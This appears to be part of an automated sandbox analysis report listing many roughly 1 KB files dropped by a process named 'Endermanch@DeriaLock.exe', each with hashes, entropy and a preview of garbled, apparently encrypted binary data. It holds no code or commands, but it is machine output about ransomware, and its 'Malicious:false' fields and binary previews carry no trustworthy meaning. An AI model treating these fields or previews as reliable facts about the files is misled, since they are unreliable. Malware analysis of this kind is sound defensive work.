                                                                                                                                                    SHA1:C8CC2DFDCCF7439B3A95DC7F6E077E5F2D68617D
                                                                                                                                                    SHA-256:12841394D1677427C5E8002DC395234F2E28971D49740C85AE3AB9487E043A95
                                                                                                                                                    SHA-512:DF44FE8F2D11797323AACDD3EF261113BF9DD431674F85270018C65808ED9136DA418504540A0A906F0C8C49ED220AEF11555DBC3B3BF973E962812F902CDF4E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...e.e....8s.1....l.D\TY..:.A.H%M`j..b.....j..E...s....E.....\{..@.@.Xv..n...;+.j./..E!.Y)0.....2.....y.;.[.s.F..gu8..s...<\.d...1....= I....W.$.`%!.G..\...e[2*...Q.WP.P.y kW...(....C....../.q.5..v_a.b.?u...v.....5{.'NW..3C..eH'.>.l...L.._.m.H.s...b.-..L........7....J}6...'......]....\*..|Xl.....Mt..N.....@y.,8e..O.r;N...F.Y......;Y.i.T.a....:.?....._.1..uC..C(.?^......1.g.f0`C.'.6NM..l.Nr#.l.....Z..~...U.:O+<{.l,....fq.7..........u...l..#.#...e......!;.Y..nA~.....+...*~.1.0G.....i....E.v.s.V.5+N)..g..{.B.....o.p..XgH.R..Q|...i..U.Z7...o....o.....9..bJ....S........Y.X.$...R...?.u1#c.P.*..e.$..g.n.Q\w...F...*.9..m....~.m.\<..._..%x....)?..%.....A.Dq.$O.....J........?.9.4.J./Q,Zm...,.y.Q...M......<....37`.....rX.D.k[.....S5..>.......B.u....t......R....<...A...s..t@...5}..}H.f....=8{Rz..`3/.(_....}<..K.P..,./.D|...tF...p.3.YZ..J .TW..}.1,..J.~...Q......c............. ....|+./.q.)..D.bS7....).I...63.$C..IV..7...[}^.e.F.....\..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.811904970329215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:B4EwtCGeFbfJpWEDVavzSTcXzfE849/Awuf1PkqCD:B0CDFbfCEDV0+TcbEdgfGj
                                                                                                                                                    MD5:05A23D6E556F812B6C64C0E029659E13
                                                                                                                                                    SHA1:5E430CBB271B37BEC179ADC8A85A820E7F23D6EC
                                                                                                                                                    SHA-256:97AFA482FC43FAACED61742E526442569E65042B1C33ED17D3F4E9F338A8FF49
                                                                                                                                                    SHA-512:B86EE02D8F046955DC7287EEB2B56AFE90E57FDD4CAB5CA47135926E9DCD7A79959C4BEB58B986517F58A3BD0F3FADF6F7CE1F34CDB0330177502A91489C7010
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.!.Z.\.3Z>...6..1.i.p...8e.gd...x..WL].$zs.#a.F...V.:`.3.7.t.tz..ogA.*P..>./..=.....S..lc_.S.[......,..y.. .7Z....F'..!J...[\]Z..4.i..A..nz....E..I(...Z@"..../..T...S.>.Xx.W....ls"G,..u...4]Z..J.8:9............OzC..VL.I..............&.`..5......]..(4Xm...(......f/...5.....bW*_....(~...cY.....w....4.mKW^.2....kT.y.6..e....j=}e.T.....g.....LcN......G.KA:...L........@.#..l...N.:....m..(..-g5....M.....91'..Z{y..?..-..#~..MT....^8.N....a..f.}..."..y.#..7.g.ZJ .t..~y..\..[..<.....e1.O...g....X#.).|.8....,m.}.E`fe.ev..z'.%....T.Y.Fs..3....9K.j.r..`<.:y.Z.....(...s..Y....L.&\.I.q.B.M.1Af.+X.$..UsG.....Q.........1.4.H.*p.K`.w.a..h.Y...m./..=..H.]I;<.TFheP......!.....hs.T.....n.r.Z.>..5.X>z.M.p.1.@.d..1...,...<......,....M....c.<Y.y.*.Qd...F....._..p..E<M.,!.D...4.3.1.|.f....H<....._.G..3.@/.9.-....iY.v...L...\s~.2...Va1&..1.T..^.....~.j9=.M..~.!g::|>;7....a....!:..........u^{...=.t....M....)......VT.$....N].......2;6>...w.........DO(.}..+v.1..)
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.823173114576589
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:MO4b/YBsaH23bopZFCn/M3YswdWnk98rW85CDgUw5MBJYlg:MOhsaH28Po/Morwk98rtuP9BJsg
                                                                                                                                                    MD5:4E8CEAD0A0B4F954C098619F580D40DF
                                                                                                                                                    SHA1:A4EEF7FD4533FFC48805E785613EE32D26BF2FF6
                                                                                                                                                    SHA-256:1FFC443108C984829ECAEE495304076D2BD9149988FDD916182925976E06B2AA
                                                                                                                                                    SHA-512:40E6BA680A7E447387B0D4C11DF3FDF03E7F49BDD638AFD793973C652E8584FEE394EE701404A2DA2E1310BF27A7F1F8C835EBCC4AF917921B3D956E9390E4BA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:]$........."..R}*...W..TvZ]. .2^..@K....H......X...8.L....`.J..^..R...lf......i/. ?.Cm..Y..'?..2/-..k,S.=D~0....T....P.c,\EQ....@x.b^.m..?5:....L...:.~.L wtlO......TP.=n~r?Du..BI3jW.0|....*.$....7.i.h...LRb..,w....p...8.(.9..,.....O`Mc=Z'.^l.....?.1....kf...;.A.{../......11...x.A..6l....Xv.w.lH...Xr:....*y.c.+...<.W.s..J...X.}....E.dv7........:^..I#.M..hE.9..U......O.hV..........h..<7n_.Mem).&V....*.qQ'.B.H.......N y1.........G.._.].......... IE.ba.....-..2..E.....@.27'.4...-...g..sD.m.b..R..+.!................-.+.........M...<..4G'......#.A3w..3CK.X..T`V.^...9.X...b[..S.....]}s.R...`.B......}.J....Cf......<^..f...1p.&U.....F....rN.D.(.....(@... ...}.&@.\.J.$..@..x/V{).u.`.......3.G..%.....m?.K....L.k.;.I....[....^{rO.H.....O.;...,.R.....fc..-~.....k..mq.<.....1Y..p.)=......2..y..H2(..Tl6^yHh.L....x........ZY...<.AN+.x..t.....m.m........../......{_..fY..?M..~(...~......F>.(.D.....D..w.S.v....A...+........=gcBg...Y.k...N.2.).V.R.=..f.Vz.3..W.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.836823069385127
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:tqB/qRuP1BVFUVZjI36WI4HNZ1DAsmickaNU9VZrdOk9u/JeLkSy:aiYRG+LI4tZ18MgUhweLE
                                                                                                                                                    MD5:49529287A0B0AAF10ED1F1433FFAD6D0
                                                                                                                                                    SHA1:F9E615BF830537531B424D86CCD2AE5597514568
                                                                                                                                                    SHA-256:59511E5B6C3DFE24EF8D7B36025F11D2537FCA30D4D7C7E148907F576C38AECD
                                                                                                                                                    SHA-512:1D0ABC7E7A9E68B4C4F08E2D918F3D3E9583C899AD95B1FDC992FF2BCED2A3CB7D2DDFBA055076684D3A45DA8AA7857C8F1C5D6BBF6F3337A437F4B8D500AEA0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.0.....n(...*'...[...C.;a~..>`....[7..;..N..Hc.v.].Oot.sy.$Y.c~...N:...d....-.......#d.e7.m...y.xz.3....7rS.,.E.q.I.&.T..]W.H.S..^#D........8..>.D$..B...6._DO..)...s.........iD.....6TK....J.P.9..<kdW.b.$..zm5.zad3.6#(.04.R..}..(.".8(w.s~..:D........V.......0..+x..4..k..T...z..._3v..|.g0m.."..pZ..UQ.n....7.Um.X.).2U....W........f..[......g:....E#..\..)l.>%p.Q[..&..+.H.[.,.s22..4Q`."........GL...m.k.......lC..%.nbA....94.P.&}...C;.f.u.Us.+:.4*......R........>Y......L..o......D...........c?..|z..u.>...v..J.>...(.$...\Z.I2...8...Rr....l+....i.H{.7,..m.D..5B.........'.u..K..0cI....%.gIs.....\H { K.g..b.~6..._...Kp...^V.S4s....V.v~.Y......2.@.......0....E.iN..WU.. ."a.A..\....F.R..[/.+...Z....c5-..Q.bR..f'...T...<..3.$.....|..a.8..8..P.!.d.u..@a.....s.t...8...fO...g....O<;....VE......K.m>...1.xZ...{.*..1...y"C..H.......";@.......P.J.h.[C.#..dA.B.....j...^.{D.....J......@`.*......k.z.>zcU...;.:.<.1w.....V>.w.{Wz......J...]..K....{......=S..eU...6.i./
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.813969234784885
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:VE3LVAkFN+6NNS7dwbA+kkUt42d/zJvn+b/LMldKC+CLSk:e3xA846N8Gb/UZdFmHMl9FLSk
                                                                                                                                                    MD5:3F6790188997AD0B027541D7CB451355
                                                                                                                                                    SHA1:1227AF7BAC9B8E03FD5272C9F2D2EFD50DA83454
                                                                                                                                                    SHA-256:2AF7473460144DEDD639278C86DA168F583F68A6B1DBF897FC8D7C77D0FC3713
                                                                                                                                                    SHA-512:A8DBFBE292F2D28649E910C2FE950C71595395BB68F5042E85369380639219527748F5086E8F0A0CCFD1BE996BAB2913FD29B61AC05032159F8523CC32AF993A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.f........+q.W...........m.A.RJl-..0....p~...'..m~..RZ......)]<r+..U.a..I.H.v.K..z..w..T.`.e.4..]....q.1...Gw.......p+.'..[.M.>m...'..Xh~.Y..d..1...:)....2.L.)..3..P.5..g....g.x.*.*.[..e.@.I...r|......].4.%8n<...H|..in...L{...EN.%.}...x.i... ......g.u........H.3...3...@.Z...Fu...M...:...h...SLS^]..v..7...T.x....g.Ju..(.3....t.HZT....Z..-L.\.KCf.M....xyI.A..X...Y=...4..p.=G.s.. r....+.T.&S....w.l..X.Y...d.....y.x..."}D.c..a.1...4....R.....R ;...2i.l....R.z%.Ay...}_.:$.. j..I......#2T.c.P.5sA7O..3..........}.......3~ r..&..R.l..j..A.......GI..^.@;L.}5\ D._......C....N..."T"7.zaT...G>c.......c.fu........X....kc..q.d13jj1.Ei......cE\../Xg/JH.Y$.......W.|.u.n....*...#....8M.....P8.IAOR"L?..t...0,.NZ...Kt.S.....fQZ.j.3.&..5..H.....Y..A.z.yL........ar...EP...Q{...b.O7L..A{..j...j...."d........A...<.<.'.O.@f.k.....?.~.f!.R9.6l_D...0....9..g.c.N{V.4*`ba.I(T...EE..!...gP.F......u%....MI.....3.D.......a..arWg..In.C...&.v).......`...V.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.8380197323990615
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:0YF+sX+ASRod0wbnsdhMr9ux7D7AUciqphAJNzoGS+YVyn:d1PeMPY7M5+n8U9z/p5n
                                                                                                                                                    MD5:D7AB95044CE6335600C2DB9049F4FBB4
                                                                                                                                                    SHA1:D5F65798A53675BA248ABD23BC9D47DAF5861D07
                                                                                                                                                    SHA-256:D08FEDA748A95026DBED63D42FA8379C74CAB1BDC0B600BA248C9E2B8FA37330
                                                                                                                                                    SHA-512:466BB6A5B0E4A7A2209CF4FD71A018265B56797D6CAABDC0CC36306C5CEC2ADA9EF2CD1985B803DAF08B9C14F9FF470B3B7CC34EE8946CB3A5CC2989057F1147
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:B.;..2.U..L.....).f..F.bF...E.[.G.t/Q....0UV..q.C4_.....s..Dv....h.......vb.y..3J.1......?FY^....\.R#.-jw^u..R8.s.2CX...~.s...B14..`P4A......i2~p.4...#VM.....'.G..h....1}j...,-..v...f..nO..$..........j......Z..MUs..BF2.1..2~.u?.3*...!.+...,...~...z.0...{..v.....y.#c/k@+/.....A..*.Zu...n.0C..4..&.h..|9J....G..U5,.y...mv.u......sH...0...'...Fh`..#}[...}w..Nj.....#x.I9..J......W.#.].J...._[?...3.98^...$..Cl....*.6q.RQ..}.J.....+H.).D..M...?.V.'Z..4zz~=V.|~...<.r1..2...`.5.. ...`.+p.6r.,H..o...wA].p. f...8..Q .....kF35N./k...r...{..%..h...u..2.....c.F.,p....<'. HVd..&...kd.-..*..Eo.@.A.l.[....'.J..9.K$.D..O...J(p.........[.`0..JNF.=.S..ap.k.T!4.s...W......;".".._@..F...jY7........b.IZ.6.P40....TX....e.N.v.hb..(j{.0 ^-:...w.+p...G.:6{....O.....yD.(..>..O..@O.}.:.oR.B.y>.....ca..V...Y......f...Ry......zXo.L.....M.8.17l.......F.2.._...`..,c...fH.H...... .......X*..7h..m.'......L..-.q.Y.0?j4.[.....^.|;.......Z.".rJ..1Z>.8...Etm/.Xu....|2.&
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.8223497837008065
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:3GqhVoEq0SsRSdHtvvvAmSjr4q1rnfFJ/1po8Lq3EV0pE6OI:31VotcCN/ir4qhtJ/1po8ma0pEXI
                                                                                                                                                    MD5:031BAB4E600336FE7D396493D13E07FD
                                                                                                                                                    SHA1:4FD61427C3F3AA85FD92B03F6CFDB1FBC55E89C1
                                                                                                                                                    SHA-256:5606FD74B46231EA20EF5D89D7EBB8390528888316E5705649F90054D818AB15
                                                                                                                                                    SHA-512:F7AE2A8D3743A980593A6E60D131695F437288A75E776ACD5918534FF89E5F6FB5018D76439CE356DBD5B001782118E4632E886D51C1758B6AAB617EE7BDDB91
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...p.^..H....0..C._.W.3.z....<r+..#!.......mp..ca..zXy<...Q.}...)...?..t'.i........e..$............J.k..Z..?....r.P...Q.oZ ......'..........}.g...L.=[d..v5..............A....x..lRpi...C.Go.l.e!.a.4.q&..y....Q..........@...t8.D..,<ea@.].qV..."......%.......<..+....w.xA...t.0.._....b.5&6...BU.".....8..,E........RiM....R.y.I.+..N..2....3.......RS .4u.<+....I~...(L.......#i..J.....Y.&..86.q.3.]+7v./...2...b...{8.#.3#.....Y.UXv..+?b.*.G..m.p%:.............]3..^....u^_TU..m.......|^....1.....0..<..-{B.[^..........e..Q[..c..y.....b.^..#...U|..s{...n...q.......O.,.A....:.H.,...8!<..3..T%..............n.".A.&.............m..MO.S.8.._o..~S..FS..(@./.#....e...~.p.\j....^..........h"n......+_..+9..C...}&.%....:..$...".......h..R.TTh.R...9.p...D..M..O..6c....;.q..wtb..........."...y$~P{.v..n...p`..tOX...B.K./..j..{}...>.+M.I..b.i.tB.........q.......a...H..+.}^.O.K`.2.=.|.D/.&..+As/.t......gb:.[..%..>D.6x....\.B.../{.MC..*N}|%U...p..v..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.798139074466624
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:80NcKqTyzdSp8VJci1rMGAUfIz54d5rZR2nljNs5Ufs09GX06JgWP:801zHVHMGpfU+rZRilbs5t
                                                                                                                                                    MD5:D88C652F9F2F7A6B26CB0FEE81729001
                                                                                                                                                    SHA1:6379F589794BBCE6BC810B38E3C8D12249721031
                                                                                                                                                    SHA-256:F425CFAFFEC6E68688E334A42A53DEC7DA22D8CDDEB354F58922D24CCD96A425
                                                                                                                                                    SHA-512:B347F2D9AABE2227E421CE4D9F7D0309B812A9E73364AEFF9736C7D480EB2F7D376192D576D8A739890F48F182B21E692E821CCD1B718018750DCEEED38D1BFC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.0"..$...4!-.,.H<...X.C<./..78.31....uI........S.z]MR'.!..L..u.Q....=.......Qg....!.`.W.[^.;.Ue..s .8.(....Y.F....jw...(..]...[..4.....#..H.yNgaWhRI..:.~..(.n6.x5V..g.79..s/.l...Im.j...s....s.@..u.#..H....r............1$../..^.8.*U.b...?......P'...Q.Wl....[-.....)P.. .8#^..{hI....z...l.*..;.j.a;...Nj.r)@..P..g...^Z.8VQr....8.E.vn.....=...._.Y:........e.tq...-!....1...e..#5].../.7.m.lT......c..bb.>(..U........i'.!x.U.M...z..a..t<.HI.k...=.......t.a5.HN...Q(..s..`.2o.:7.o.....sB.GJ.Y.....#..&.]..~.........l.:/........L:z.ANO...9.i..E`3.t...Qt@.0L...qg.}..{e;x.z....3.3.9..|.|l.o.~j.O...p.F.H<..2'.sz.gg3..R.'h....c!;.......P....W..l./...W<...z..O._..z..R-..8....=?.....h...4....>|............d.VyZ.O.h.M.;C...V.........&.z..3...w...R..Ru.#['..oB..6.........\.W..&cnS...g.nh.....eEV.AR........$.9^eu.V..J.J../...M.O.I&..V.].Wiyh.l.y.%z..]..T..4....D........$.A....D...0......B.).Jg..R@..K...P.M,;..X.g..2....Y.yd.?:=......H4.D.v.$..X...:..$.@.Rv...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.810751603846747
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:Dq3Z+IGlrB0Q77SutH9Cfclmgv863LFEI5MRnHGbwQk:oZqwutH9Cf3NI5gHGUQk
                                                                                                                                                    MD5:40730E91E175D1F80C6EA4D193BD758B
                                                                                                                                                    SHA1:7D4563B55D229982C7783F962848349C39DBF2DB
                                                                                                                                                    SHA-256:685C4466A2F1C2575A8B19A2772C5D43CD43246D15FC2A5CDC75D7587D2E4C2A
                                                                                                                                                    SHA-512:3FDBB962232296F29302F1D11A1DBB1E8B4CD95DCBC2F6122AF53C59CEFB833B81F3F0F14ED180B2D2BF2B0B02DF88ADB1963796A005C45E4EB54855C397287F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.....`[..6C...../2)z.......o.2[O......Z"..x3.<.D...K.....e@.W$.i..W.a$...a..$X.h.J.{.+:.cF<....S".......#.C.3..K...be..s......;.5..)........P.A...i.i tkP;%)".9,{-p.q.Y.;.~.:>.....*E2...GT......;.>.M..1W].......{{.;~...H,0.._......-....=......be..F....t........S..;..!k.E.[l.T8..e...P.).^...J\?..`.<.6..k0m.1~.|..@.....+..a..D0..[c...r......[.+...!..41..[w....~/V..ZU.w..8...T.........n..:...L...p!R..v.D.......i...7.l......."..R;r..r'......wW.g..?....B0......{f..M.....T..4...FY9S....M|..$.\...S.Q.$_.X....(..EZ..m..:3...Q....*z..J...9........[.....n'.}..{.6.K.}.rOD,.<...D.>.z...".C..1..e`....dW.1....!....N;..5...r....x.u"....=F...&G...|.,.+x3n|#.... .Y.q.."..VQU.u.m2..8..._.$p...eB....S....{.,....x.....;.Z%. .]..].BU.......U...5.^...c.......1_..".....e...=.8.,6.t.Z4GtQ^.4H.M.+.....S.....Q.b".7.^...05R...J......u.....s/../.M...W...0...dpbk?...../".gP..K.!y.....e..F`g.....cC|x[.......'K.&.vk.u.?ITJ>{={Ga........U..bCES"to..Y....O;......,m..u9..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.8303026004968865
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:mo6Ivie6rotcb/vAY1H2zeJZAuTJM8BNxRi981OpT:uIv/t1Y1H4eJjmKNxK8ApT
                                                                                                                                                    MD5:7025EBD97859BDAD8F09141081062F70
                                                                                                                                                    SHA1:7D3834A4B4122584A7FF7E8B36DCCD984BE8510E
                                                                                                                                                    SHA-256:58CBA3F694D69A56DE4037260EA81E955978F6AD1F39C69E4C8AE986C481D4E9
                                                                                                                                                    SHA-512:C7BB20825D7436E3B02D5E8F6EE299F35E75A9C4D84BB23534A02BA547B7A1AA922C023AF23630CDA8A31BFE6BE42E5FA2238FC76AB1C43B50871E0A3042F28F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.b.sFhTj.q#:K..*. ..2.:.....~..".fJ...:....}......[.'...v.si..........I....!.L..4...!.G.....E..n!.&......w_.46.m.i2T`..1....)?<....?..D:.J....y.....9."...Z....;di...E..7....TT.+.S..J..4.......4...|./.p|<R.......>Y..v9.~.k..E..$6.=6f.)0.An......t.........h.A..i....f....u..w..J......}....W...{.n.t..:...].l..K..&.....Bw.\i(....F>.P}.!....R..C..!".<.. 1........<3O..4....XM.7...8...l./.....&...@....=y....h{.x;=...x.vUV%|2@s.*.qV..8K..u..S._...d5/3......j..i.25q....iaI..RU.Co....."...Q.+.g...{..p<W.. ..F..6.?..H..H.9....E3.1.0[\].!.Ls....8~p]o...S.../..@'.Z&.F.d9.P.j...L.Z... 3...,?/....]..m.'\WU... \.6.T&?9i.Q...........I.-..?B.e..,.........0.W79..t....,f......+.).....y...W..L.{.g..~.lV...cSF...m?z....}.Q....=...zurVo...k.\V.w)X....y.8d...?.D.x}n<....E..A..........8'v.V&g.#.9.....(..O,z..`:...O.R.`...%.gO.....V.4@.H.QT....Ik.yij...V..v:\..`....N..N.mR"..7......k!.+.....1.|-...P.1.a.|........f...W....Z....p....?s....786...E.)69..#O.S......h
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.790472642986947
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:2y1buYWDtJxXGeXGvNrIknkGOt9rfEjaSiLb+5UYtjaiHdp5:2KSpVwS2kjt9E0u/tjaYdp5
                                                                                                                                                    MD5:0BCD326DFE8E363C24B910517391AAE6
                                                                                                                                                    SHA1:46E8F4651AD72F0E4261738E74D17BA9AA46680A
                                                                                                                                                    SHA-256:60972CA3872C39F8D1C001A9BDEB149452FB2EF459E2A2F2AF6F1F494521D23E
                                                                                                                                                    SHA-512:14308CE63C76F5B470743ABFFF7C505EE454191FF93351FCAEE86BCC92E764B295507A763E3E73495152A8EA46A0865C5B14BAD9D7A973AA40B2F7987A15078C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:P...<.z......U......(}.yD-{...U."$0]...i.Xm#y...6..-..l..E.D.X...Jm&.9.ucf....B...d.t..9....fj.......Durp.'@6.&.J.c..(L~t.........5F..8;...?z....7."......`..//..-..H_.mN.K}..]p.{......g..P.........U.u.E.m.}..b.8h.......[...E...,...B.Cu...(....y.V....d3-#.>...|C..Y...n+......3-{.=/...Rf"L.^.ay...}l:E2.+.*T...-...C.F.2.'...d........LU.#..D:_..F..E."U......,?@]..de...?....,u.....Z.}:.5O3.....@}{1fV.......T........!r|......S.0..wc^..3b....%.!.V...R..4....iX....P..(.Y..8.~.U.W.<............K'..^..XL.I...R>..#IVm.b:....=.@5jUR-#.K.u..b.\.D...+16A.mW..YB.9..@kgL.4P.A..{J.....M..Bn......O..z.".*....r...?>i'....aU....p..4..}....4.......Sb.y.,....?......p.x..u#...wX.).......d.-...8Z"...c.....b.V.....;5.^.n...K.o..E....^8{v\..z ..<.3.b7{/2..T.eL?=...R.......)<...v.]J.....%DoO~....%....1...).RM..?\%..IX.J..Ut...{X.OzT....g.J.....@i......%.=h%}.8.c..........c.\.,..|J.H.E......_W1../.D.... .l.%]...[.1...v...)....Om..Ut%.W&....7.....xz..hUb..,
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.841986684989216
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:gjgA/rmWJ0mcHcJuA7V20FlhnU2MKELcy3WHTQ6COgGSG:gJZJluAh2GlBU24L1WKGSG
                                                                                                                                                    MD5:71A758179B18A0D013B7B6E1BADC7F38
                                                                                                                                                    SHA1:88B4305934005CAB90184BF7F9B111A0BC4E7DA4
                                                                                                                                                    SHA-256:334FB594E2BDF20939F63735AA51B50098BBAE24011A65D11BB956E3ECF9A81E
                                                                                                                                                    SHA-512:3C327BCB245ED116D0D7891FB4C293E028F5E86D4A967C86D7D8353B0B44EFEA50896E6DA829F8DB520EE2A119C0C63C1D3C754BC6D1235E2DE4B21BAD5FA911
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:p...>..?.#..G&J...x.....[..k............|460:.........HM..<Y(...O..C.).2w..|....9..........'.[MI.g|hP+.KB...o..}..(.y./B..t..:......Z^.d......3....x.......$E..^d..V..x@yx!.k._...m.S-IL..$yyG..>Qq.....F{./...J.p...4+..0...*./.V...g...gpUe5g..%`....-,W....z.......Dc.O=..&..J.aY.?`EZ.O.ZX]2v.......v.jf......7....L...0.%.......4]`...B&.-"..l..2...._h{...5...A.........4.OU=....M..|g.+..V.cd.8..s......[!.+p...j3....N.&.k..6..7..!..G.t..._4%.^Q...<J.uB.9Z...N.V..Y...F;P....00.g...!.......!...7q.8.7..v. .J.B...Q....O...Q.....R.Xf....u..`..&.9....Gu.c.z..,}...K.S.Z..N[.....E...V.$kJ1.K.8!.]#+.k.....{........aILP/.....C;|;w..u}+}e .. ..=...=c..s.i6>.WC..;..I....t@K.F.......2..Co.tL../..SW%.....#-.b......)6.G..'...........&.f.+T...........8E)=.t..W....^...]m}.~.q.>..u.*.t...N.ATh.@N.....f...=LV...k....S.c........-.g`..F.#I.P.9(....|..7.&q........3.....Io.n.".bG.Mz.....,{....rU..<}.H......j.'#i.$.GUV+.Ozgf.....].:......nk.)...X..iyp..,..0...o.V...2.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.808409016772001
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:pbJ4+q8Av7OwQdL93lXX+Tr4rKxk396nfRylsu00/AznZBn0:T28Av7JQnkSN65yl+hnZq
                                                                                                                                                    MD5:6AE204913DDE38860ADC511C8312AC16
                                                                                                                                                    SHA1:D1E92A9076263C8B69C341588C33FAB22CAC3B07
                                                                                                                                                    SHA-256:648B7A98DEE64BE3DF2ABB50119756345E91FECF6CF7C62797F69876C3C9B8CC
                                                                                                                                                    SHA-512:E5AB2EB71F694D0AB10ABE67C6A44482FD8790F757C7ABFFCDF630A163EB05A6B7AD10BE4C59ECDA4B02583D6802BB0854A232DE4721F8A1C6B020AF06142C22
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..-.c...N....g..:..=..Am......d&....Ct.h<..?...C.Og..|...o.j.....T...X...l;#..o.....~B.M.J0.V.E.'...8..c.......eI..u.....L...:.4X.......l ........@....J.R+2.....=s.....nw*)6.J[.gE...;.^I*g.6J8...!-ae........#m.T..Q.....k...E..f..pnC/.\....z.Q....*h./.y.f.n.S$.*...f26.....l..X.....[.S..7..._.z...Y..n.*.....u4.c...gQ./.%V.......,......B..^..j+iF._P5KaK@[.F!`..6..6.....O.1....,.z.s$$......;..{..JR.dV.7..E.i...B~...r.#.8.....)..Fyl.....%.<.....$...|u..9%i.{...nC......u.F....4...Q.taLc...g...Z...l.Q.*.....K.Ay6....[. .N..ai^'K..T......f~+..X4k.>}.r...e..%..1.........A.G..LS..K.u.....B.Y..i.......un1f.[..=U$...K.........!.y0..|5O...OE!....'..-UNM.Q..@Aa'z..."..|_.....[.....<P...].S..Q..`.-.s.F.V. .I.k.LQ..nh...<n.k...got6..@i.QJ...C.3y..md....[.U[.".(..r....v..ub.{.......F..|Qb..^>:.......z#[.@....s....F..U..%&..rk.L...-q.'D..[\.....*m.M..N....pTC.n.X.w..?....6/.',Pu...w...y...'.*_....Kx!..8..../.C.x....A.e......k..x..<......5*A..7.E/7....I"
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.812562610581461
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:/3X+MUwwY3cd7lgCyNpvaWXWwqROEPrKooOujjcML:vX+M93ugCy/hHqROED5oOujrL
                                                                                                                                                    MD5:BF65E3EC1E0ECCB8CE2E2333F46470DF
                                                                                                                                                    SHA1:AFD4A2547871BA35B493C3FA02B0E674426B43C2
                                                                                                                                                    SHA-256:0F16BD93BF73D6B5E0154C790537C118AAE2D6F1D48F8561E43856F725882FA4
